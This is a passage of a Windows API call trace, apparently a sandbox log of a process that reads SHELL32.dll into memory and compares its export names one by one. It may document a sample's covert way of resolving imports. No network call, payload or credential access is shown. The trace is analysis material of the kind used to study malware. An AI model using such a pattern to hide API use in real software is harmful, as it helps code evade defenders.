0x7ffc5ecf6e30 [0172.754] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0172.755] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0172.755] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0172.755] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0172.756] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0172.756] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0172.756] GetProcessHeap () returned 0x580000 [0172.756] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1587258) returned 0x40b8040 [0173.159] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0173.159] ReadFile (in: hFile=0x140, lpBuffer=0x40b8040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b8040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0176.563] CloseHandle (hObject=0x140) returned 1 [0176.563] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0176.563] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0176.564] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0176.564] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0176.564] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0176.564] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0176.564] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0176.564] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0176.564] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.564] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0176.564] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0176.564] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0176.564] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.564] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0176.564] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0176.564] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0176.564] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0176.564] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.564] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0176.564] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.564] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.565] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0176.565] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0176.565] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0176.565] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0176.566] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0176.566] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0176.567] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0176.568] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0176.569] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0176.579] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0176.580] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0176.580] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0176.580] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0176.580] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0176.580] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", 